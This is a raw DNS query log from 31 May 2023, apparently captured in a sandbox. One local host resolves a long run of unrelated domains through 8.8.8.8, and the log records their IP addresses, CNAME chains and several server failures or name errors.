                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.520742893 CEST8.8.8.8192.168.2.30x2725No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.546544075 CEST8.8.8.8192.168.2.30xf67bNo error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.590656042 CEST8.8.8.8192.168.2.30xa689Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.597296000 CEST8.8.8.8192.168.2.30x911eServer failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.611008883 CEST8.8.8.8192.168.2.30xc801No error (0)www.netcr.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.611008883 CEST8.8.8.8192.168.2.30xc801No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.611008883 CEST8.8.8.8192.168.2.30xc801No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.611008883 CEST8.8.8.8192.168.2.30xc801No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.613888979 CEST8.8.8.8192.168.2.30x32d2No error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.613888979 CEST8.8.8.8192.168.2.30x32d2No error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.613987923 CEST8.8.8.8192.168.2.30x9d31No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.667685986 CEST8.8.8.8192.168.2.30xbce1No error (0)revoldia.net154.210.36.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.719919920 CEST8.8.8.8192.168.2.30xe64bServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.745570898 CEST8.8.8.8192.168.2.30x93No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.773160934 CEST8.8.8.8192.168.2.30x439No error (0)www.snugpak.com172.67.165.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.773160934 CEST8.8.8.8192.168.2.30x439No error (0)www.snugpak.com104.21.73.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.803345919 CEST8.8.8.8192.168.2.30xf52bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.807681084 CEST8.8.8.8192.168.2.30x1f3No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.855345011 CEST8.8.8.8192.168.2.30xd598No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.901073933 CEST8.8.8.8192.168.2.30x2085No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.911349058 CEST8.8.8.8192.168.2.30x9676No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.935256004 CEST8.8.8.8192.168.2.30xfd5eNo error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.011663914 CEST8.8.8.8192.168.2.30x28afNo error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.038297892 CEST8.8.8.8192.168.2.30xa229No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.038297892 CEST8.8.8.8192.168.2.30xa229No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.038297892 CEST8.8.8.8192.168.2.30xa229No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.044857025 CEST8.8.8.8192.168.2.30x4dfNo error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.044857025 CEST8.8.8.8192.168.2.30x4dfNo error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.054832935 CEST8.8.8.8192.168.2.30x8940No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.182233095 CEST8.8.8.8192.168.2.30x1418No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.182779074 CEST8.8.8.8192.168.2.30x7fddName error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.218240023 CEST8.8.8.8192.168.2.30x9fa3Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.245534897 CEST8.8.8.8192.168.2.30x111bNo error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.245534897 CEST8.8.8.8192.168.2.30x111bNo error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.245995998 CEST8.8.8.8192.168.2.30x7dc9No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.245995998 CEST8.8.8.8192.168.2.30x7dc9No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.245995998 CEST8.8.8.8192.168.2.30x7dc9No error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.245995998 CEST8.8.8.8192.168.2.30x7dc9No error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.245995998 CEST8.8.8.8192.168.2.30x7dc9No error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.245995998 CEST8.8.8.8192.168.2.30x7dc9No error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.293423891 CEST8.8.8.8192.168.2.30xed36No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.322485924 CEST8.8.8.8192.168.2.30x633bNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.377830029 CEST8.8.8.8192.168.2.30x1fd7No error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.377830029 CEST8.8.8.8192.168.2.30x1fd7No error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.396723032 CEST8.8.8.8192.168.2.30x46cbNo error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.397291899 CEST8.8.8.8192.168.2.30xcf18No error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.397372007 CEST8.8.8.8192.168.2.30x224aNo error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.402570009 CEST8.8.8.8192.168.2.30x2c85No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.405064106 CEST8.8.8.8192.168.2.30x8cfbNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.405834913 CEST8.8.8.8192.168.2.30x90f2No error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.411919117 CEST8.8.8.8192.168.2.30x43dfNo error (0)gcss.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.419043064 CEST8.8.8.8192.168.2.30x24c4No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.419043064 CEST8.8.8.8192.168.2.30x24c4No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.419043064 CEST8.8.8.8192.168.2.30x24c4No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.515145063 CEST8.8.8.8192.168.2.30x25a1No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.519769907 CEST8.8.8.8192.168.2.30x9768No error (0)araax.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.519769907 CEST8.8.8.8192.168.2.30x9768No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.519769907 CEST8.8.8.8192.168.2.30x9768No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.519769907 CEST8.8.8.8192.168.2.30x9768No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.520227909 CEST8.8.8.8192.168.2.30x3897No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.584122896 CEST8.8.8.8192.168.2.30x911eServer failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.623063087 CEST8.8.8.8192.168.2.30xbb02Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.648319960 CEST8.8.8.8192.168.2.30xab7dName error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.671086073 CEST8.8.8.8192.168.2.30x3bb9Name error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.676485062 CEST8.8.8.8192.168.2.30xcc09Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.692960978 CEST8.8.8.8192.168.2.30x5f59No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.735744953 CEST8.8.8.8192.168.2.30x63ddNo error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.765482903 CEST8.8.8.8192.168.2.30x62f8No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.765482903 CEST8.8.8.8192.168.2.30x62f8No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.765482903 CEST8.8.8.8192.168.2.30x62f8No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.765482903 CEST8.8.8.8192.168.2.30x62f8No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.765482903 CEST8.8.8.8192.168.2.30x62f8No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.773480892 CEST8.8.8.8192.168.2.30xcf9aNo error (0)onzcda.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:19.976370096 CEST8.8.8.8192.168.2.30xf52bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.009592056 CEST8.8.8.8192.168.2.30xd1a4Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.028454065 CEST8.8.8.8192.168.2.30x3353No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.028454065 CEST8.8.8.8192.168.2.30x3353No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.040214062 CEST8.8.8.8192.168.2.30x4a09No error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.042571068 CEST8.8.8.8192.168.2.30x1363Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.069430113 CEST8.8.8.8192.168.2.30xa050Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.122231007 CEST8.8.8.8192.168.2.30xbfa3No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.348736048 CEST8.8.8.8192.168.2.30xe498No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.442348957 CEST8.8.8.8192.168.2.30x717eNo error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.601428032 CEST8.8.8.8192.168.2.30x911eServer failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.651968002 CEST8.8.8.8192.168.2.30xa715Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.790116072 CEST8.8.8.8192.168.2.30xe70bNo error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.792515039 CEST8.8.8.8192.168.2.30xc323No error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.905663013 CEST8.8.8.8192.168.2.30x1a2dNo error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.942174911 CEST8.8.8.8192.168.2.30xf003Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.964306116 CEST8.8.8.8192.168.2.30x6f6fNo error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:20.992847919 CEST8.8.8.8192.168.2.30x43c0No error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.119251013 CEST8.8.8.8192.168.2.30x9f0fNo error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.119251013 CEST8.8.8.8192.168.2.30x9f0fNo error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.151146889 CEST8.8.8.8192.168.2.30x255aNo error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.217304945 CEST8.8.8.8192.168.2.30x2f24No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.277070045 CEST8.8.8.8192.168.2.30xe9edNo error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.313669920 CEST8.8.8.8192.168.2.30xcdd5Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.336123943 CEST8.8.8.8192.168.2.30x33d2Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.359189987 CEST8.8.8.8192.168.2.30xf5daNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.367438078 CEST8.8.8.8192.168.2.30xf522Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.453319073 CEST8.8.8.8192.168.2.30x6e0aNo error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.457736015 CEST8.8.8.8192.168.2.30x8ff1No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.457736015 CEST8.8.8.8192.168.2.30x8ff1No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.457736015 CEST8.8.8.8192.168.2.30x8ff1No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.659610033 CEST8.8.8.8192.168.2.30xa715Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.664279938 CEST8.8.8.8192.168.2.30xa167Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.688019991 CEST8.8.8.8192.168.2.30x65ddNo error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.810677052 CEST8.8.8.8192.168.2.30xb9b1No error (0)dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.810677052 CEST8.8.8.8192.168.2.30xb9b1No error (0)dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.964927912 CEST8.8.8.8192.168.2.30xf003Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:21.984513044 CEST8.8.8.8192.168.2.30xf52bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.137979031 CEST8.8.8.8192.168.2.30x414cNo error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.263123035 CEST8.8.8.8192.168.2.30xb3dcNo error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.285723925 CEST8.8.8.8192.168.2.30x9e9bNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.300430059 CEST8.8.8.8192.168.2.30x7806No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.307754040 CEST8.8.8.8192.168.2.30x868cNo error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.307754040 CEST8.8.8.8192.168.2.30x868cNo error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.486449957 CEST8.8.8.8192.168.2.30x70bServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.526222944 CEST8.8.8.8192.168.2.30x4428No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.616821051 CEST8.8.8.8192.168.2.30xa64cServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.661494017 CEST8.8.8.8192.168.2.30xa715Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.698797941 CEST8.8.8.8192.168.2.30x21a7No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.703741074 CEST8.8.8.8192.168.2.30x9817Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.710393906 CEST8.8.8.8192.168.2.30x968cServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.720094919 CEST8.8.8.8192.168.2.30x6adfNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.806595087 CEST8.8.8.8192.168.2.30x1656No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.806595087 CEST8.8.8.8192.168.2.30x1656No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.806595087 CEST8.8.8.8192.168.2.30x1656No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.894565105 CEST8.8.8.8192.168.2.30xe494No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.966471910 CEST8.8.8.8192.168.2.30xf003Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.990525007 CEST8.8.8.8192.168.2.30x4814No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.999296904 CEST8.8.8.8192.168.2.30x1fbcNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.999296904 CEST8.8.8.8192.168.2.30x1fbcNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.999474049 CEST8.8.8.8192.168.2.30x606eNo error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.999496937 CEST8.8.8.8192.168.2.30xdf11No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:22.999840975 CEST8.8.8.8192.168.2.30x9360No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.006970882 CEST8.8.8.8192.168.2.30x691dNo error (0)shesfit.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.006970882 CEST8.8.8.8192.168.2.30x691dNo error (0)shesfit.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.099103928 CEST8.8.8.8192.168.2.30xa797No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.099103928 CEST8.8.8.8192.168.2.30xa797No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.099103928 CEST8.8.8.8192.168.2.30xa797No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.099103928 CEST8.8.8.8192.168.2.30xa797No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.115386963 CEST8.8.8.8192.168.2.30xf1c1No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.116440058 CEST8.8.8.8192.168.2.30x7644No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.124166965 CEST8.8.8.8192.168.2.30x516cNo error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.129465103 CEST8.8.8.8192.168.2.30x22bfNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.146260977 CEST8.8.8.8192.168.2.30xe0c3No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.276547909 CEST8.8.8.8192.168.2.30x1e49Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.336967945 CEST8.8.8.8192.168.2.30xd0a6No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.369251013 CEST8.8.8.8192.168.2.30x23c0Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.497333050 CEST8.8.8.8192.168.2.30x19f4Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.558727980 CEST8.8.8.8192.168.2.30x230dNo error (0)mjrcpas.com47.91.170.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.636471987 CEST8.8.8.8192.168.2.30xcceaNo error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.705271959 CEST8.8.8.8192.168.2.30xe4c2No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.716545105 CEST8.8.8.8192.168.2.30x9817Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.718612909 CEST8.8.8.8192.168.2.30xcf8eNo error (0)anduran.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.718612909 CEST8.8.8.8192.168.2.30xcf8eNo error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:23.718612909 CEST8.8.8.8192.168.2.30xcf8eNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
